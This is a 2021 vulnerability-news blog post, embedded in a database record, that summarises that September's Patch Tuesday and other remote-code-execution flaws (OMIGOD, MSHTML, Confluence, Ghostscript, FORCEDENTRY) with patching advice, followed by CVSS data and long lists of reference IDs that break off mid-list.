Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostscript RCE, FORCEDENTRY Pegasus

2021-09-18T23:22:00

Description

Hello everyone! This time, let's talk about recent vulnerabilities. I'll start with Microsoft Patch Tuesday for September 2021. I created a report using my Vulristics tool. You can see [the full report here](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_september2021_report_avleonov_comments.html>). The most interesting thing about the September Patch Tuesday is that the top 3 VM vendors ignored almost all RCEs in their reviews. However, there were interesting RCEs in the Office products. And what is most unforgivable is that they did not mention CVE-2021-38647 RCE in OMI - Open Management Infrastructure. Only ZDI wrote about this. ## Microsoft Patch Tuesday September 2021 ### OMIGOD [Dubbed “OMIGOD” by researchers at Wiz.io](<https://www.infosecurity-magazine.com/news/microsoft-fixes-omigod-mshtml/>), the bugs could enable a remote attacker to gain root access to Linux virtual machines running on Azure. “We conservatively estimate that thousands of Azure customers and millions of endpoints are affected. In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk,” the firm warned. So, OMIGOD RCEs and EOPs with detected exploitation in the wild are in the Vulristics TOP. What else? ### Chrome/Chromium/Edge RCE An exploitation in the wild has been seen for Chrome/Chromium/Edge vulnerability CVE-2021-30632. Still no comments from the VM vendors, only from ZDI. ### WLAN AutoConfig RCE Only Qualys and ZDI mentioned CVE-2021-36965 Remote Code Execution in Windows WLAN AutoConfig Service. "This would be highly useful in a coffee shop scenario where multiple people are using an unsecured WiFi network." Also note several EOPs in Windows Kernel, Windows Common Log File System Driver and Windows Print Spooler. ### MSHTML RCE But of course, people were mostly waiting for fixes for a vulnerability that wasn't released on Patch Tuesday, but a week ago. However, the updates only became available on September 14th. It is CVE-2021-40444 Microsoft MSHTML Remote Code Execution Vulnerability. "А critical zero-day RCE vulnerability in Microsoft’s MSHTML (Trident) engine that was exploited in the wild in limited, targeted attacks". "To exploit this vulnerability, an attacker would need to create a specially crafted Microsoft Office document containing a malicious ActiveX control". Well, people are saying that ActiveX is not being used in new exploits for this vulnerability. This is serious, consider this in your anti-phishing programs and, of course, install patches. ## Non-Microsoft vulnerabilities I would also like to say a few words about [other recent non-Microsoft vulnerabilities](<https://avleonov.com/vulristics_reports/september_2021_other_report_avleonov_comments.html>). ### Confluence RCE I would like to mention the massively exploited CVE-2021-26084 Confluence RCE. A week passed between the release of the newsletter and the public exploit. If your organization has Confluence, keep an eye on it and never make it available at the perimeter of your network. ### Ghostscript RCE Also, the "[Ghostscript provider Artifex Software released a security advisory](<https://www.jpcert.or.jp/english/at/2021/at210039.html>) regarding a vulnerability (CVE-2021-3781) that allows arbitrary command execution in Ghostscript. On a server running Ghostscript, an attacker may execute arbitrary commands by processing content that exploits this vulnerability". There is a [public exploit](<https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50>) for this vulnerability. Ask your developers if they use it to process SVG files. ### Pegasus FORCEDENTRY macOS RCE And finally the RCE CVE-2021-30860 FORCEDENTRY vulnerability that was used in Pegasus spyware. The exploit that was spotted in the wild relies on malicious PDF files. The vulnerability became famous mainly because of iPhone attacks, but t[here are also patches for macOS Big Sur 11.6 and 2021-005 Catalina](<https://nakedsecurity.sophos.com/2021/09/14/apple-products-vulnerable-to-forcedentry-zero-day-attack-patch-now/>).

{"id": "AVLEONOV:5945665DFA613F7707360C10CED8C916", "vendorId": null, "type": "avleonov", "bulletinFamily": "blog", "title": "Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostscript RCE, FORCEDENTRY Pegasus", "description": "Hello everyone! This time, let's talk about recent vulnerabilities. I'll start with Microsoft Patch Tuesday for September 2021. I created a report using my Vulristics tool. You can see [the full report here](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_september2021_report_avleonov_comments.html>).\n\nThe most interesting thing about the September Patch Tuesday is that the top 3 VM vendors ignored almost all RCEs in their reviews. However, there were interesting RCEs in the Office products. And what is most unforgivable is that they did not mention CVE-2021-38647 RCE in OMI - Open Management Infrastructure. Only ZDI wrote about this.\n\n## Microsoft Patch Tuesday September 2021\n\n### OMIGOD\n\n[Dubbed \u201cOMIGOD\u201d by researchers at Wiz.io](<https://www.infosecurity-magazine.com/news/microsoft-fixes-omigod-mshtml/>), the bugs could enable a remote attacker to gain root access to Linux virtual machines running on Azure. \u201cWe conservatively estimate that thousands of Azure customers and millions of endpoints are affected. In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk,\u201d the firm warned. \n\nSo, OMIGOD RCEs and EOPs with detected exploitation in the wild are in the Vulristics TOP. What else?\n\n### Chrome/Chromium/Edge RCE\n\nAn exploitation in the wild has been seen for Chrome/Chromium/Edge vulnerability CVE-2021-30632. Still no comments from the VM vendors, only from ZDI.\n\n### WLAN AutoConfig RCE\n\nOnly Qualys and ZDI mentioned CVE-2021-36965 Remote Code Execution in Windows WLAN AutoConfig Service. "This would be highly useful in a coffee shop scenario where multiple people are using an unsecured WiFi network."\n\nAlso note several EOPs in Windows Kernel, Windows Common Log File System Driver and Windows Print Spooler.\n\n### MSHTML RCE\n\nBut of course, people were mostly waiting for fixes for a vulnerability that wasn't released on Patch Tuesday, but a week ago. However, the updates only became available on September 14th. It is CVE-2021-40444 Microsoft MSHTML Remote Code Execution Vulnerability. "\u0410 critical zero-day RCE vulnerability in Microsoft\u2019s MSHTML (Trident) engine that was exploited in the wild in limited, targeted attacks". "To exploit this vulnerability, an attacker would need to create a specially crafted Microsoft Office document containing a malicious ActiveX control". Well, people are saying that ActiveX is not being used in new exploits for this vulnerability. This is serious, consider this in your anti-phishing programs and, of course, install patches.\n\n## Non-Microsoft vulnerabilities\n\nI would also like to say a few words about [other recent non-Microsoft vulnerabilities](<https://avleonov.com/vulristics_reports/september_2021_other_report_avleonov_comments.html>).\n\n### Confluence RCE\n\nI would like to mention the massively exploited CVE-2021-26084 Confluence RCE. A week passed between the release of the newsletter and the public exploit. If your organization has Confluence, keep an eye on it and never make it available at the perimeter of your network.\n\n### Ghostscript RCE\n\nAlso, the "[Ghostscript provider Artifex Software released a security advisory](<https://www.jpcert.or.jp/english/at/2021/at210039.html>) regarding a vulnerability (CVE-2021-3781) that allows arbitrary command execution in Ghostscript. On a server running Ghostscript, an attacker may execute arbitrary commands by processing content that exploits this vulnerability". There is a [public exploit](<https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50>) for this vulnerability. Ask your developers if they use it to process SVG files.\n\n### Pegasus FORCEDENTRY macOS RCE\n\nAnd finally the RCE CVE-2021-30860 FORCEDENTRY vulnerability that was used in Pegasus spyware. The exploit that was spotted in the wild relies on malicious PDF files. The vulnerability became famous mainly because of iPhone attacks, but t[here are also patches for macOS Big Sur 11.6 and 2021-005 Catalina](<https://nakedsecurity.sophos.com/2021/09/14/apple-products-vulnerable-to-forcedentry-zero-day-attack-patch-now/>).", "published": "2021-09-18T23:22:00", "modified": "2021-09-18T23:22:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://avleonov.com/2021/09/19/security-news-microsoft-patch-tuesday-september-2021-omigod-mshtml-rce-confluence-rce-ghostscript-rce-forcedentry-pegasus/", "reporter": "Alexander Leonov", "references": [], "cvelist": ["CVE-2021-26084", "CVE-2021-30632", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-3781", "CVE-2021-38647", "CVE-2021-40444"], "immutableFields": [], "lastseen": "2021-11-26T18:43:30", "viewCount": 159, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-3781"]}, {"type": "apple", "idList": ["APPLE:60998B3B940109A56BF6379394ED5080", "APPLE:8C1BA0F4BE51DB0968E9F4F1E9D14283", "APPLE:C50792B317EF097406A9E9F4BBAA8D46", "APPLE:E01F2833FC14279371768789610339B0", "APPLE:F4733CD8CAEEC05AE6BBB1A2AAC1D5EF"]}, {"type": "archlinux", "idList": ["ASA-202109-3", "ASA-202109-6"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844"]}, {"type": "attackerkb", "idList": ["AKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:A655707A-D5EC-4F21-AFEE-D9C97837C840", "AKB:AC92E5DD-15E0-44E1-99A5-C1AED6D4703F", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0548", "CPAI-2021-0554", "CPAI-2021-0684", "CPAI-2021-0685"]}, {"type": "chrome", "idList": ["GCSA-2705646769654617144"]}, {"type": "cisa", "idList": ["CISA:7A03F1FDD93F2460E93364A81C411404", "CISA:82FAB13698D3611E1292062AD6C8B405", "CISA:C70D91615E3DC8B589B493118D474566", "CISA:D7188D434879621A3A83E708590EAE42"]}, {"type": "cve", "idList": ["CVE-2021-26084", "CVE-2021-30632", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-3781", "CVE-2021-38647", "CVE-2021-40444"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4972-1:D5274", "DEBIAN:DSA-4972-1:EB781"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-30632", "DEBIANCVE:CVE-2021-3781"]}, {"type": "exploitdb", "idList": ["EDB-ID:50243"]}, {"type": "f5", "idList": ["F5:K04481502"]}, {"type": "fedora", "idList": ["FEDORA:1910130B132D", "FEDORA:19E593090F0D", "FEDORA:3A0B8309A62E", "FEDORA:4CD8430AA7AD", "FEDORA:5C0DB31397D8", "FEDORA:E043930AE6E8"]}, {"type": "freebsd", "idList": ["47B571F2-157B-11EC-AE98-704D7B472482"]}, {"type": "gentoo", "idList": ["GLSA-202201-02"]}, {"type": "githubexploit", "idList": ["00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "09412330-832C-538A-A226-61474048E41B", "0990FE6E-7DC3-559E-9B84-E739872B988C", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "111C9F44-593D-5E56-8040-615B48ED3E24", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "1EC6324C-A18E-517A-9A55-F1C2D1BCA358", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "24DE1902-4427-5442-BF63-7657293966E2", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "374D00E3-03E0-5580-9CDF-C7CCABB45C2F", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "54D698B4-9CF0-5D7F-88D2-1053A11EA7C3", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "5BC9FD05-BCBB-5B7C-AE22-BE3732D2976B", "610ADCD3-C281-52D4-A546-467569FE3AC1", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "64DFB465-6754-5E4B-B311-7668EDD4D962", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "6BC80C90-569E-5084-8C0E-891F12F1805E", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "7333A285-768C-5AD9-B64E-0EC75F075597", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "7C32DA80-90D8-53DB-8CDA-E29BFB69B548", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "8217668C-9748-5511-8C01-7E933D69F872", "84D5F04A-0DDB-5788-8759-DA99D303B756", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "8B4EDA16-9E27-500D-B648-9C3AD4295562", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A6B7D4D8-4578-5AD8-961D-3BC35007FF29", "A99AB73C-8E46-5B9C-A402-F78F96EE2327", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "B16D26DB-D60C-5C0C-9452-80112720B442", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BF40B403-9D06-5460-8B40-3FC2E56A4A07", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A", "CE477D7E-7586-5C82-8DCC-033C48461E66", "D03F8616-CD02-52E2-80E1-347A8A3132BC", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "E06577DB-A581-55E1-968E-81430C294A84", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "FA1DEEA0-A8AF-5C21-98E6-9D3379266529", "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FF761088-559C-5E71-A5CD-196D4E4571B8"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:13ED546BFEDF54BBE09B80D00208352E", "GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:433978802EA1E557CC5202EE1014E67B", "HIVEPRO:8AF52D0A3BB6DDEEAC663A63DA954039", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340"]}, {"type": "ibm", "idList": ["1E405D4974F6EA8AB73C7DDA9E9B3B2FCA2359AF05B6CF7C124046402F2BC520"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634"]}, {"type": "kaspersky", "idList": ["KLA12277", "KLA12278", "KLA12284", "KLA12286", "KLA12289", "KLA12290", "KLA12297"]}, {"type": "kitploit", "idList": ["KITPLOIT:1624142243530526923", "KITPLOIT:2590785192528609562", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:5187040326820919368", "KITPLOIT:5230148353750207837", "KITPLOIT:698315176468431184", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC"]}, {"type": "mageia", "idList": ["MGASA-2021-0436"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0A7B79D902F4C3089D6602A5A3520EDF", "MALWAREBYTES:11D4071979D3FC1E6028AA8D71EB87F4", "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-LOCAL-CVE_2021_38648_OMIGOD-", "MSF:EXPLOIT-LINUX-MISC-CVE_2021_38647_OMIGOD-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-30632", "MS:CVE-2021-36965", "MS:CVE-2021-38647", "MS:CVE-2021-40444"]}, {"type": "mskb", "idList": ["KB5005563"]}, {"type": "msrc", "idList": ["MSRC:69CC27233CB7711437A7019644E4AE73"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["APPLE_IOS_1255_CHECK.NBIN", "APPLE_IOS_148_CHECK.NBIN", "AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DSA-4972.NASL", "EULEROS_SA-2022-1787.NASL", "EULEROS_SA-2022-1804.NASL", "EULEROS_SA-2022-1839.NASL", "EULEROS_SA-2022-1863.NASL", "FREEBSD_PKG_47B571F2157B11ECAE98704D7B472482.NASL", "GENTOO_GLSA-202201-02.NASL", "GOOGLE_CHROME_93_0_4577_82.NASL", "MACOSX_GOOGLE_CHROME_93_0_4577_82.NASL", "MACOS_HT212804.NASL", "MACOS_HT212805.NASL", "MICROSOFT_EDGE_CHROMIUM_93_0_961_47.NASL", "OMI_1_6_8_1.NASL", "OMI_CVE-2021-38647.NBIN", "OPENSUSE-2021-1273.NASL", "OPENSUSE-2021-1300.NASL", "OPENSUSE-2021-1303.NASL", "OPENSUSE-2021-1330.NASL", "OPENSUSE-2021-3044.NASL", "OPENSUSE-2022-0070-1.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005606.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_5005623.NASL", "SMB_NT_MS21_SEP_5005633.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SUSE_SU-2021-3044-1.NASL", "SUSE_SU-2021-3180-1.NASL", "UBUNTU_USN-5075-1.NASL", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964"]}, {"type": "osv", "idList": ["OSV:DSA-4972-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:164694", "PACKETSTORM:164925", "PACKETSTORM:165214", "PACKETSTORM:167317", "PACKETSTORM:167449"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:1EBCA555F1E846ACB6207A523F56D750", "QUALYSBLOG:5101CC734C1A900451E5994AFF57209A", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C8139A26F9F7474D197CBF36F4F05D3D", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:8C1A6CAF7B07CD1A38A8D65351756A2F", "RAPID7BLOG:8D4E5743B0CE5246D493CE7356B4972D", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3781"]}, {"type": "saint", "idList": ["SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01", "SAINT:E5FBEA63E5EE8A91F5066541141037D1"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1273-1", "OPENSUSE-SU-2021:1300-1", "OPENSUSE-SU-2021:1303-1", "OPENSUSE-SU-2021:1330-1", "OPENSUSE-SU-2021:3044-1", "OPENSUSE-SU-2022:0070-1", "OPENSUSE-SU-2022:0110-1"]}, {"type": "thn", "idList": ["THN:0488E447E08622B0366A0332F848212D", "THN:080602C4CECD29DACCA496697978CAD0", "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:2741F0E9DD9F764C60701C9C81F231C5", "THN:362401076AC227D49D729838DBDC2052", "THN:3691EA68445933ED72DD1B52F712F791", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:4DE731C9D113C3993C96A773C079023F", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:69DC54E89A77C1E4E0DFE9C6EA3BAB48", "THN:6A9CD6F085628D08978727C0FF597535", "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "THN:8A60310AB796B7372A105B7C8811306B", "THN:919B3D59F2A9DE80FF2DC5F8833E4831", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:B7217784F9D53002315C9C43CCC73766", "THN:BB8CDCFD08801BDD2929E342853D03E9", "THN:BD014635C5F702379060A20290985162", "THN:C4188C7A44467E425407D33067C14094", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:E72737D2B8E842D4AB9BD4F993737BD9", "THN:E7762183A6F7B3DDB942D3F1F99748F6", "THN:F076354512CA34C263F222F3D62FCB1E"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:1A88FF1D2951B8467D062697D5D05CFA", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "THREATPOST:958AA77BA7D3A5325FEB47A5DE036F1C", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:C6B47B678F2F0E21955D4053DE13FA64", "THREATPOST:FD28EAD589B45A1A4A7412632B25CEAB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "ubuntu", "idList": ["USN-5075-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-30632", "UB:CVE-2021-3781"]}, {"type": "veracode", "idList": ["VERACODE:32050", "VERACODE:32108"]}, {"type": "zdt", "idList": ["1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-36967", "1337DAY-ID-37024", "1337DAY-ID-37126", "1337DAY-ID-37781"]}]}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "apple", "idList": ["APPLE:60998B3B940109A56BF6379394ED5080", "APPLE:8C1BA0F4BE51DB0968E9F4F1E9D14283", "APPLE:C50792B317EF097406A9E9F4BBAA8D46", "APPLE:E01F2833FC14279371768789610339B0", "APPLE:F4733CD8CAEEC05AE6BBB1A2AAC1D5EF"]}, {"type": "archlinux", "idList": ["ASA-202109-3", "ASA-202109-6"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940"]}, {"type": "attackerkb", "idList": ["AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0548", "CPAI-2021-0554"]}, {"type": "chrome", "idList": ["GCSA-2705646769654617144"]}, {"type": "cisa", "idList": ["CISA:7A03F1FDD93F2460E93364A81C411404", "CISA:82FAB13698D3611E1292062AD6C8B405", "CISA:C70D91615E3DC8B589B493118D474566", "CISA:D7188D434879621A3A83E708590EAE42"]}, {"type": "cve", "idList": ["CVE-2021-26084", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-38647", "CVE-2021-40444"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4972-1:EB781"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-30632"]}, {"type": "exploitdb", "idList": ["EDB-ID:50243"]}, {"type": "f5", "idList": ["F5:K04481502"]}, {"type": "fedora", "idList": ["FEDORA:1910130B132D", "FEDORA:19E593090F0D", "FEDORA:3A0B8309A62E"]}, {"type": "freebsd", "idList": ["47B571F2-157B-11EC-AE98-704D7B472482"]}, {"type": "gentoo", "idList": ["GLSA-202201-02"]}, {"type": "githubexploit", "idList": ["4B524E35-6179-5923-8FEE-CFFDB1F046D9", "8B907536-B213-590D-81B9-32CF4A55322E", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:13ED546BFEDF54BBE09B80D00208352E"]}, {"type": "hivepro", "idList": ["HIVEPRO:433978802EA1E557CC5202EE1014E67B", "HIVEPRO:8AF52D0A3BB6DDEEAC663A63DA954039", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7CB37AC69862942C5D316E69A7815579"]}, {"type": "kaspersky", "idList": ["KLA12277", "KLA12278", 